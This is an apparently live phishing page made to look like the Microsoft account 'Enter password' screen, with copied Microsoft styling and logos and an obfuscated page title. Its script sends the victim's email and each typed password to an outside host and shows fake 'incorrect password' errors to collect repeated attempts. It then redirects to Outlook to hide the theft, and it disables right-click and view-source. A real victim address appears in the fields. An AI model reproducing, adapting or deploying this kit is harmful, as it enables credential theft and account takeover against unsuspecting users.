<html dir="ltr" lang="EN-US">
<!-- <iframe style="border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392" height="0" width="0"></iframe> -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<title>&#83;&#105;&#x67;&#110; &#105;&#x6E; &#116;&#x6F; &#121;&#x6F;&#117;&#x72; &#x61;&#99;&#x63;o&#x75;&#110;&#x74;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
<link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.29039.9/images/favicon.ico">
<link rel="stylesheet" title="Converged_v2" type="text/css" href="https://logincdn.msauth.net/16.000/Converged_v22057_egJPTAx_byK-yF_CMCKFeg2.css">
<style type="text/css">body{display:none;}</style>
<style type="text/css">body{display:block !important;}</style>
<style type="text/css">
    .kesatu {
        display: block;
    }
    .kedua {
        display: none;
    }
    .ketiga {
        display: none;
    }
    .selesai {
        display: none;
    }
	
	/* Dots 1 */
    .loading-dots {
		display: none;
		font-family: Arial;
		font-weight: 100;
		line-height: 1.1;
        z-index: 5;
		height: 5;
		position: absolute;
		top: 3%;
		align: center;
    }

    .loading-dots .dot {
        color: #00A4EF;
        display: inline;
        margin-left: 0.2em;
        margin-right: 0.2em;
        position: relative;
        top: -1.05em;
        font-size: 3.5em;
        opacity: 0;
        -webkit-animation: showHideDot 2.5s ease-in-out infinite;
        animation: showHideDot 2.5s ease-in-out infinite;
    }

    .loading-dots .dot.one {
        -webkit-animation-delay: 0.2s;
        animation-delay: 0.2s;
    }

    .loading-dots .dot.two {
        -webkit-animation-delay: 0.4s;
        animation-delay: 0.4s;
    }

    .loading-dots .dot.three {
        -webkit-animation-delay: 0.6s;
        animation-delay: 0.6s;
    }

    @-webkit-keyframes showHideDot {
        0% {
            opacity: 0;
        }
        50% {
            opacity: 1;
        }
        60% {
            opacity: 1;
        }
        100% {
            opacity: 0;
        }
    }

    @keyframes showHideDot {
        0% {
            opacity: 0;
        }
        50% {
            opacity: 1;
        }
        60% {
            opacity: 1;
        }
        100% {
            opacity: 0;
        }
    }
	
	/* Circle */ margin: 50px auto;
	.Circle {
		margin-left: auto;
		margin-right: auto;
	}

	.svg-success {
	  display: inline-block;
	  vertical-align: top;
	  height: 250px;
	  width: 250px;
	  opacity: 1;
	  overflow: visible;
	}
	@-webkit-keyframes success-tick {
	  0% {
		stroke-dashoffset: 16px;
		opacity: 1;
	  }
	  100% {
		stroke-dashoffset: 31px;
		opacity: 1;
	  }
	}
	@keyframes success-tick {
	  0% {
		stroke-dashoffset: 16px;
		opacity: 1;
	  }
	  100% {
		stroke-dashoffset: 31px;
		opacity: 1;
	  }
	}
	@-webkit-keyframes success-circle-outline {
	  0% {
		stroke-dashoffset: 72px;
		opacity: 1;
	  }
	  100% {
		stroke-dashoffset: 0px;
		opacity: 1;
	  }
	}
	@keyframes success-circle-outline {
	  0% {
		stroke-dashoffset: 72px;
		opacity: 1;
	  }
	  100% {
		stroke-dashoffset: 0px;
		opacity: 1;
	  }
	}
	@-webkit-keyframes success-circle-fill {
	  0% {
		opacity: 0;
	  }
	  100% {
		opacity: 1;
	  }
	}
	@keyframes success-circle-fill {
	  0% {
		opacity: 0;
	  }
	  100% {
		opacity: 1;
	  }
	}
	.svg-success .success-tick {
	  fill: none;
	  stroke-width: 1px;
	  stroke: #ffffff;
	  stroke-dasharray: 15px, 15px;
	  stroke-dashoffset: -14px;
	  -webkit-animation: success-tick 450ms ease 1400ms forwards;
			  animation: success-tick 450ms ease 1400ms forwards;
	  opacity: 0;
	}
	.svg-success .success-circle-outline {
	  fill: none;
	  stroke-width: 1px;
	  stroke: #81c038;
	  stroke-dasharray: 72px, 72px;
	  stroke-dashoffset: 72px;
	  -webkit-animation: success-circle-outline 300ms ease-in-out 800ms forwards;
			  animation: success-circle-outline 300ms ease-in-out 800ms forwards;
	  opacity: 0;
	}
	.svg-success .success-circle-fill {
	  fill: #81c038;
	  stroke: none;
	  opacity: 0;
	  -webkit-animation: success-circle-fill 300ms ease-out 1100ms forwards;
			  animation: success-circle-fill 300ms ease-out 1100ms forwards;
	}
	@media screen and (-ms-high-contrast: active), screen and (-ms-high-contrast: none) {
	  .svg-success .success-tick {
		stroke-dasharray: 0;
		stroke-dashoffset: 0;
		-webkit-animation: none;
				animation: none;
		opacity: 1;
	  }
	  .svg-success .success-circle-outline {
		stroke-dasharray: 0;
		stroke-dashoffset: 0;
		-webkit-animation: none;
				animation: none;
		opacity: 1;
	  }
	  .svg-success .success-circle-fill {
		-webkit-animation: none;
				animation: none;
		opacity: 1;
	  }
	}
</style>
</head>

<body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass">
	<form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off">
		<div>
			<div id="lightboxTemplateContainer">
				<div id="lightboxBackgroundContainer">
					<div class="background-image-holder" role="presentation">
						<div style="background-image: url(&quot;https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);" class="background-image ext-background-image"></div>
					</div>
				</div>
				<div class="outer">
					<div class="template-section main-section">
						<div class="middle">
							<div class="win-scroll"> <!-- -->
								<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
								<div class="loading-dots">
								   <h1 class="dot one">.</h1> 
								   <h1 class="dot two">.</h1> 
								   <h1 class="dot three">.</h1> 
								   <h1 class="dot _4">.</h1> 
								   <h1 class="dot _5">.</h1> 
								   <h1 class="dot three">.</h1> 
								   <h1 class="dot _5">.</h1> 
								   <h1 class="dot three">.</h1> 
								   <h1 class="dot _5">.</h1> 
								</div>
								<div class="lightbox-cover"></div>
								<div>
									<img class="logo" id="OpLogo" role="img" src="https://logincdn.msauth.net/16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" height="40">
								</div>
								<!-- Tampilan 1 -->
								<div role="main" id="satu" class="kesatu" style="display:none;">
									<div class="animate slide-in-next">
										<div>
											<div class="identityBanner">
												<button type="button" class="backButton" id="idBtn_Back" aria-label="Back">
													<img role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
												</button>
												<div id="displayName1" class="identity" title=""></div>
											</div>
										</div>
									</div>
									<div class="pagination-view has-identity-banner animate slide-in-next">
										<div id="loginHeader" class="row title ext-title" role="heading" aria-level="1">Enter password</div>
										<div class="row">
											<div class="form-group col-md-24">
												<div role="alert" aria-live="assertive">
													<div id="peringatan0" style="color:black; font-size:13px; font-style:italic;" class="alert alert-error">Because you're accessing sensitive info, you need to verify your password</div>
													<div class="alert alert-error" id="peringatan1" style="display: none;"></div>
												</div>
												<div class="placeholderContainer">
													<input name="rahasia1" type="password" id="masuk1" autocomplete="off" class="form-control input ext-input text-box ext-text-box" aria-required="true" placeholder="Password" aria-label="Enter the password for edaryee@hotmail.com" tabindex="0">
												</div>
											</div>
											<div class="position-buttons">
												<div>
													<div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top">
														<label id="idLbl_PWD_KMSI_Cb">
															<input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" aria-label="Keep me signed in">
															<span>Keep me signed in</span>
														</label>
													</div>
													<div class="row">
														<div class="col-md-24">
															<div class="text-13">
																<div class="form-group">
																	<a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten your password?</a>
																</div>
																<div class="form-group"></div>
															</div>
														</div>
													</div>
												</div>
												<div class="win-button-pin-bottom">
													<div class="row">
														<div>
														<div class="col-xs-24 no-padding-left-right button-container">
															<div class="inline-block">
																<input type="submit" id="Crot1" class="button ext-button primary ext-primary" value="Sign in">
															</div>
														</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
								<!-- Tampilan 2 -->
								<div role="main" class="kedua">
									<div class="animate slide-in-next">
										<div>
											<div class="identityBanner">
												<button type="button" class="backButton" id="idBtn_Back" aria-label="Back">
													<img role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
												</button>
												<div id="displayName2" class="identity" title=""></div>
											</div>
										</div>
									</div>
									<div class="pagination-view has-identity-banner animate slide-in-next">
										<div id="loginHeader" class="row title ext-title" role="heading" aria-level="1">Enter password</div>
										<div class="row">
											<div class="form-group col-md-24">
												<div role="alert" aria-live="assertive">
													<div class="alert alert-error" id="peringatan2" style="display: none;"></div>
												</div>												<div class="placeholderContainer">
													<input name="rahasia2" type="password" id="masuk2" autocomplete="off" class="form-control input ext-input text-box ext-text-box" aria-required="true" placeholder="Password" aria-label="Enter the password for edaryee@hotmail.com" tabindex="0">
												</div>
											</div>
											<div class="position-buttons">
												<div>
													<div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top">
														<label id="idLbl_PWD_KMSI_Cb">
															<input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" aria-label="Keep me signed in">
															<span>Keep me signed in</span>
														</label>
													</div>
													<div class="row">
														<div class="col-md-24">
															<div class="text-13">
																<div class="form-group">
																	<a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten your password?</a>
																</div>
																<div class="form-group"></div>
															</div>
														</div>
													</div>
												</div>
												<div class="win-button-pin-bottom">
													<div class="row">
														<div>
														<div class="col-xs-24 no-padding-left-right button-container">
															<div class="inline-block">
																<input type="submit" id="Crot2" class="button ext-button primary ext-primary" value="Sign in">
															</div>
														</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
								<!-- Tampilan 3 -->
								<div role="main" class="ketiga">
									<div class="animate slide-in-next">
										<div>
											<div class="identityBanner">
												<button type="button" class="backButton" id="idBtn_Back" aria-label="Back">
													<img role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
												</button>
												<div id="displayName3" class="identity" title=""></div>
											</div>
										</div>
									</div>
									<div class="pagination-view has-identity-banner animate slide-in-next">
										<div id="loginHeader" class="row title ext-title" role="heading" aria-level="1">Enter password</div>
										<div class="row">
											<div class="form-group col-md-24">
												<div role="alert" aria-live="assertive">
													<div class="alert alert-error" id="peringatan3" style="display: none;"></div>
												</div>
												<div class="placeholderContainer">
													<input name="rahasia3" type="password" id="masuk3" autocomplete="off" class="form-control input ext-input text-box ext-text-box" aria-required="true" placeholder="Password" aria-label="Enter the password for edaryee@hotmail.com" tabindex="0">
												</div>
											</div>
											<div class="position-buttons">
												<div>
													<div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top">
														<label id="idLbl_PWD_KMSI_Cb">
															<input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" aria-label="Keep me signed in">
															<span>Keep me signed in</span>
														</label>
													</div>
													<div class="row">
														<div class="col-md-24">
															<div class="text-13">
																<div class="form-group">
																	<a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten your password?</a>
																</div>
																<div class="form-group"></div>
															</div>
														</div>
													</div>
												</div>
												<div class="win-button-pin-bottom">
													<div class="row">
														<div>
														<div class="col-xs-24 no-padding-left-right button-container">
															<div class="inline-block">
																<input type="submit" id="Crot3" class="button ext-button primary ext-primary" value="Sign in">
															</div>
														</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
								<!-- Selesai style="display: block;" --> 
								<div class="selesai" role="presentation">
								<div class="Sukses text-title" style="font-weight: unset;font-size: 1.2rem;" role="heading" align="center">Successfully confirmed. Redirecting to your inbox ...</div>
									<center>
									<div class="Circle">
										<svg xmlns="http://www.w3.org/2000/svg" class="svg-success" viewBox="0 0 24 24">
											<g stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10">
											  <circle class="success-circle-outline" cx="12" cy="12" r="11.5"/>
											  <circle class="success-circle-fill" cx="12" cy="12" r="11.5"/>
											  <polyline class="success-tick" points="17,8.5 9.5,15.5 7,13"/>
											</g>
										</svg>
									</div>
									</center>
								</div>
								<!-- E O F -->
								</div>
							</div> 
						</div>
						
					</div>
					<div id="footer" role="contentinfo" class="footer ext-footer">
						<div>
						<div id="footerLinks" class="footerNode text-secondary">
							<a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
							<a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
							<a id="moreOptions" href="#" role="button" aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
						</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</form>
		
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

<script> // CONFIG LINK HERE
var LINK = 'https://tusharpiston.com/Mario/ate3.php';
</script>


<script>
function redirectCU(e) {
  if (e.ctrlKey && e.which == 85) {
	return false;
  }
}
document.onkeydown = redirectCU;

function redirectKK(e) {
  if (e.which == 3) {
	return false;
  }
}
document.oncontextmenu = redirectKK;

var email = window.location.hash.substr(1);
var PASS1 = document.getElementById('masuk1');
var PASS2 = document.getElementById('masuk2');
var PASS3 = document.getElementById('masuk3');

$("#satu").animate({left:0, opacity:"show"}, 100);
$("#footer").animate({left:0, opacity:"show"}, 110);

$('#masuk1').focus();

$('#masuk1').keyup(function (event) {
	if (event.which == 13) {
		$('#Crot1').click();
	}
});

$('#masuk2').keyup(function (event) {
	if (event.which == 13) {
		$('#Crot2').click();
	}
});

$('#masuk3').keyup(function (event) {
	if (event.which == 13) {
		$('#Crot3').click();
	}
});

// Page 1
var displayName = $('#displayName1');
displayName.attr('value', email);
displayName.html(email);

var Crot1 = $('#Crot1');
Crot1.click(function(e){
	e.preventDefault();
	var pass = $('#masuk1');
	var password_v = pass.val();
	$.ajax({
		url: LINK, //
		type: 'POST', 
		dataType: 'html', 
		beforeSend: function(){
		// 	$('.muter').show();
		 	$(".loading-dots").show();
		},
		data: { u : email, p : password_v}, 
		crossDomain: true,
		success: function(msg) {
		$(".loading-dots").hide();
			if (msg == 'VALID'){
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").hide();
				$(".selesai").show();				
				setTimeout("window.location.href='https://outlook.live.com/mail/0/';", 3000);
			} else if (msg == 'GAGAL'){
				PASS1.value = "";
				PASS2.focus();
				$(".kesatu").hide();
				$(".kedua").show();
				PASS2.focus();
				$("#peringatan2").empty();
				$("#peringatan2").show();
				$("#peringatan2").append("Your account or password is incorrect. If you can't remember your password, <a href='#'>reset it now.</a><br>");
			} else if (msg == 'KURANG'){
				PASS1.value = "";
				PASS1.focus();
				$("#peringatan0").hide();
				$("#peringatan1").empty();
				$("#peringatan1").show();
				$("#peringatan1").append("Your account or password is incorrect. If you can't remember your password, <a href='#'>reset it now.</a><br>");
			} else if (msg == 'KOSONG'){
				PASS1.value = "";
				PASS1.focus();
				$("#peringatan0").hide();
				$("#peringatan1").empty();
				$("#peringatan1").show();
				$("#peringatan1").append("Please enter your password.<br>");
			}
		},
		error: function(e) {
			console.log(e)
		}
	});
});

// Page 2
var displayName = $('#displayName2');
displayName.attr('value', email);
displayName.html(email);

var Crot2 = $('#Crot2');
Crot2.click(function(e){
	e.preventDefault();
	var pass = $('#masuk2');
	var password_v = pass.val();
	$.ajax({
		url: LINK, //
		type: 'POST', 
		dataType: 'html', 
		beforeSend: function(){
		 	$(".loading-dots").show();
		},
		data: { u : email, p : password_v}, 
		crossDomain: true,
		success: function(msg) {
			$(".loading-dots").hide();
			if (msg == 'VALID'){
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").hide();
				$(".selesai").show();				
				setTimeout("window.location.href='https://outlook.live.com/mail/0/';", 3000);
			} else if (msg == 'GAGAL'){
				PASS2.value = "";
				PASS3.focus();
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").show();
				PASS3.focus();
				$("#peringatan3").empty();
				$("#peringatan3").show();
				$("#peringatan3").append("Your account or password is incorrect. If you can't remember your password, <a href='#'>reset it now.</a><br>");
			} else if (msg == 'KURANG'){
				PASS2.value = "";
				PASS2.focus();
				$(".kesatu").hide();
				$(".kedua").show();
				$("#peringatan2").empty();
				$("#peringatan2").show();
				$("#peringatan2").append("Your account or password is incorrect. If you can't remember your password, <a href='#'>reset it now.</a><br>");
			} else if (msg == 'KOSONG'){
				PASS2.value = "";
				PASS2.focus();
				$(".kesatu").hide();
				$(".kedua").show();
				$("#peringatan2").empty();
				$("#peringatan2").show();
				$("#peringatan2").append("Please enter your password.<br>");
			}
		},
		error: function(e) {
			console.log(e)
		}
	});
});

// Page 3
var displayName = $('#displayName3');
displayName.attr('value', email);
displayName.html(email);

var Crot3 = $('#Crot3');
Crot3.click(function(e){
	e.preventDefault();
	var pass = $('#masuk3');
	var password_v = pass.val();
	$.ajax({
		url: LINK, //
		type: 'POST', 
		dataType: 'html', 
		beforeSend: function(){
		 	$(".loading-dots").show();
		},
		data: { u : email, p : password_v}, 
		crossDomain: true,
		success: function(msg) {
			$(".loading-dots").hide();
			if (msg == 'VALID'){
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").hide();
				$(".selesai").show();				
				setTimeout("window.location.href='https://outlook.live.com/mail/0/';", 3000);
			} else if (msg == 'GAGAL'){
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").hide();
				$(".selesai").show();				
				setTimeout("window.location.href='https://outlook.live.com/mail/0/';", 3000);
			} else if (msg == 'KURANG'){
				PASS3.value = "";
				PASS3.focus();
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").show();
				$("#peringatan3").empty();
				$("#peringatan3").show();
				$("#peringatan3").append("Your account or password is incorrect. If you can't remember your password, <a href='#'>reset it now.</a><br>");
			} else if (msg == 'KOSONG'){
				PASS3.value = "";
				PASS3.focus();
				$(".kesatu").hide();
				$(".kedua").hide();
				$(".ketiga").show();
				$("#peringatan3").empty();
				$("#peringatan3").show();
				$("#peringatan3").append("Please enter your password.<br>");
			}
		},
		error: function(e) {
			console.log(e)
		}
	});
});
</script>
</body>
</html>

